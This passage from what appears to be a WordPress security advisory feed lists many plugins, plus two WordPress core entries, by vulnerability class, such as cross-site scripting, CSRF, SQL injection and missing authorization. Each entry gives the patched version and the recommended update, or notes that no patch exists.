Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Request a Quote

Vulnerability: CSV Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Team Showcase

Vulnerability: Object Injection
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: WP Brutal AI

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Ultimate Instagram Feed – WordPress Plugin

Vulnerability: WordPress Plugin < 1.3.1
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.10.9
Recommended Action: Update to version 1.10.9, or a newer patched version

Plugin: Seraphinite Accelerator

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.20.32
Recommended Action: Update to version 2.20.32, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Firebase Server Key Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Football Live Scores

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Optinly – Exit Intent, Newsletter Popups, Gamification & Opt-in Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Klaviyo

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Comment Attachment

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Grid Plus – Unlimited grid layout

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Grid Layout Add/Update/Delete
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Path Traversal
Patched Version: 1.3.43
Recommended Action: Update to version 1.3.43, or a newer patched version

Plugin: WordPress Books Gallery

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Changes
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: B2BKing — Ultimate WooCommerce Wholesale and B2B Solution — Wholesale Order Form, Catalog Mode, Dynamic Pricing & More

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Information Disclosure
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Reflected Cross-Site Scripting via cf-api
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Count per Day

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 4.6.9
Recommended Action: Update to version 4.6.9, or a newer patched version

Plugin: Print My Blog – Print, PDF, & eBook Converter WordPress Plugin

Vulnerability: Unprotected AJAX Actions
Patched Version: 3.15.9
Recommended Action: Update to version 3.15.9, or a newer patched version

Plugin: Dynamic Widgets

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: JS Multi Hotel

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via Generator Tag
Patched Version: 3.7.26
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.26, 3.8.26, 3.9.24, 4.0.23, 4.1.23, 4.2.20, 4.3.16, 4.4.15, 4.5.14, 4.6.11, 4.7.10, 4.8.6, 4.9.5

Plugin: wp-ecommerce-cvs-importer

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Captcha Bypass
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Blocksy Companion

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure via blocksy_posts shortcode
Patched Version: 1.8.82
Recommended Action: Update to version 1.8.82, or a newer patched version

Plugin: IMPress Listings

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Listing Fields
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Super Store Finder

Vulnerability: Unauthenticated Email Creation/Sending
Patched Version: 6.9.4
Recommended Action: Update to version 6.9.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Improper Access Control
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via list_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Fathom Analytics for WP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: PHP Everywhere

Vulnerability: Remote Code Execution by Subscriber+ users via shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Import Spreadsheets from Microsoft Excel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 10.1.4
Recommended Action: Update to version 10.1.4, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: GF Windcave Free

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Duplication
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Automatic pages for Privacy Policy, Terms, About, Contact us

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.42
Recommended Action: Update to version 1.42, or a newer patched version

Plugin: Super Progressive Web Apps

Vulnerability: Missing Authorization
Patched Version: 2.2.22
Recommended Action: Update to version 2.2.22, or a newer patched version

Plugin: Testimonial

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Cross-Site Request Forgery via save
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: YUZO

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 5.12.94
Recommended Action: Update to version 5.12.94, or a newer patched version

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Remote Code Execution
Patched Version: 1.1.4.6
Recommended Action: Update to version 1.1.4.6, or a newer patched version

Plugin: Predictive Search

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Easy Testimonials

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Seo 301 Meta

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HD Quiz

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: Weather Effect – Christmas, Santa, Snow Falling, Snowflake Effect

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Login Block IPs

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Team Showcase

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery < 2.0.6
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Decon WP SMS

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: pTypeConverter

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: easy.jobs- Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: PixFields

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.7.1
Recommended Action: Update to version 0.7.1, or a newer patched version

Plugin: Soisy Pagamento Rateale

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 6.0.2
Recommended Action: Update to version 6.0.2, or a newer patched version

Plugin: OPcache Dashboard

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Uk Cookie

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dewplayer

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PromoBar by BestWebSoft – Customizable Advertisement Banner for WordPress Website

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: S3 Video Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 0.98
Recommended Action: Update to version 0.98, or a newer patched version

Plugin: Responsive Zoom In/Out Slider WordPress Plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SpiderVPlayer

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Quick Chat

Vulnerability: SQL Injection
Patched Version: 4.00
Recommended Action: Update to version 4.00, or a newer patched version

Plugin: Digirisk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.1.0.0
Recommended Action: Update to version 6.1.0.0, or a newer patched version

Plugin: DW Question & Answer

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.2.3
Recommended Action: Update to version 1.4.2.3, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Ajax Pagination (twitter Style)

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Dark Mode – WordPress Dark Mode Plugin for Improved Accessibility, Dark Theme, Night Mode, and Social Sharing

Vulnerability: Authenticated (Subscriber+) Local File Inclusion via ‘style’
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: FoxyPress

Vulnerability: Open Redirect
Patched Version: 0.4.2.8
Recommended Action: Update to version 0.4.2.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘deleteRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.12.7
Recommended Action: Update to version 5.12.7, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: Image Optimizer, Resizer and CDN – Sirv

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: Responsive Lightbox2

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Booking Package

Vulnerability: Reflected Cross-Site Scripting via ‘mode’
Patched Version: 1.6.02
Recommended Action: Update to version 1.6.02, or a newer patched version

Plugin: Responsive Clients Logo Gallery Plugin for WordPress – Smart Logo Showcase Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via dn
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Scripting
Patched Version: 4.6.0.3
Recommended Action: Update to version 4.6.0.3, or a newer patched version

Plugin: Change WooCommerce Add To Cart Button Text

Vulnerability: Missing Authorization via rexvs_settings_submit
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Authentication Bypass
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: SureFeedback Client Site

Vulnerability: Missing Authorization via ph_child_ajax_notice_handler
Patched Version: 1.0.35
Recommended Action: Update to version 1.0.35, or a newer patched version

Plugin: Knews Multilingual Newsletters

Vulnerability: SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WP Ultimate Email Marketer

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Meta Data Manager

Vulnerability: Cross-Site Request Forgery to Post, Term, and User Meta Deletion
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: CP Image Store with Slideshow

Vulnerability: Arbitrary File Download
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Information Disclosure
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: WP Forum Server

Vulnerability: SQL Injection
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Contact Form to Any API

Vulnerability: Missing Authorization via delete_cf7_records()
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Mail Queue

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Unauthenticated SQL Injection via bwg_tag_id_bwg_thumbnails_0 Parameter
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Ebook Store

Vulnerability: Missing Authorization via ebook_store_export_orders
Patched Version: 5.78
Recommended Action: Update to version 5.78, or a newer patched version

Plugin: Auto Tag Creator

Vulnerability: Missing Authorization via tag_save_settings_callback
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Conferencing with Zoom

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.16
Recommended Action: Update to version 3.8.16, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Local File Inclusion
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: My Wish List

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: FLV Embed

Vulnerability: Cross-Site Request Forgery to Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Soundy Background Music

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Missing Authorization to Arbitrary Custom Drop-Down Currency Switcher Editing
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 21.8
Recommended Action: Update to version 21.8, or a newer patched version

Plugin: 3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.13.3
Recommended Action: Update to version 1.13.3, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘cronLogDeleteOption’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Steveas WP Live Chat Shoutbox

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ThinkTwit

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Booking Calendar | Appointment Booking | Bookit

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: uncode-core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.39
Recommended Action: Update to version 2.5.39, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Cross-Site Request Forgery via delete_item
Patched Version: 2.1.0.14
Recommended Action: Update to version 2.1.0.14, or a newer patched version

Plugin: Kish Guest Posting

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Product Filter For WooCommerce Product

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Codestyling Localization

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.99.20
Recommended Action: Update to version 1.99.20, or a newer patched version

Plugin: Blog-in-Blog

Vulnerability: Authenticated (Editor+) Local File Inclusion via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Publisher Media Kit

Vulnerability: Regular Expression Denial of Service
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Object Injection
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Easy Career Openings

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media Library Categories

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Bulk Order Form for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Missing Authorization via get_history
Patched Version: 1.14.14
Recommended Action: Update to version 1.14.14, or a newer patched version

Plugin: Limb Gallery | Create Beautiful Image & Video Galleries

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Testimonial Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Espresso – Event Registration & Ticketing Sales

Vulnerability: Feature Bypass
Patched Version: 4.10.45.decaf
Recommended Action: Update to version 4.10.45.decaf, or a newer patched version

Plugin: Order Your Posts Manually

Vulnerability: Reflected Cross-Site Scripting via ‘cat_id’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kebo Twitter Feed

Vulnerability: Cross-Site Request Forgery via kebo_twitter_menu_render
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Kinds

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1.1
Recommended Action: Update to version 1.3.1.1, or a newer patched version

Plugin: Flex Local Fonts

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AN_GradeBook

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Nofollow

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shiny Buttons – CSS3 Button Generator for WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Maps by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: post highlights

Vulnerability: Not specified (the entry names only the affected version, 2.6)
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: MainWP Article Uploader Extension

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Stream

Vulnerability: Missing Authorization via load_alerts_settings
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 2.35
Recommended Action: Update to version 2.35, or a newer patched version

Plugin: Advanced Database Cleaner

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: WP-OliveCart

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FileBird – WordPress Media Library Folders & File Manager

Vulnerability: Missing Authorization via resAdminPermissionsCheck
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: AllWebMenus WordPress Menu Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: WCP OpenWeather

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rating by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: Not specified (affects versions <= 6.4.4)
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Server-Side Request Forgery
Patched Version: 3.8.28
Recommended Action: Update to version 3.8.28, or a newer patched version

Plugin: Advanced AJAX Product Filters

Vulnerability: Arbitrary Settings Update
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: SEO Friendly Images

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: 1003 Mortgage Application

Vulnerability: Authenticated (Subscriber+) Arbitrary File Download
Patched Version: 1.80
Recommended Action: Update to version 1.80, or a newer patched version

Plugin: PhoneTrack Meu Site Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: Under Construction

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.86
Recommended Action: Update to version 3.86, or a newer patched version

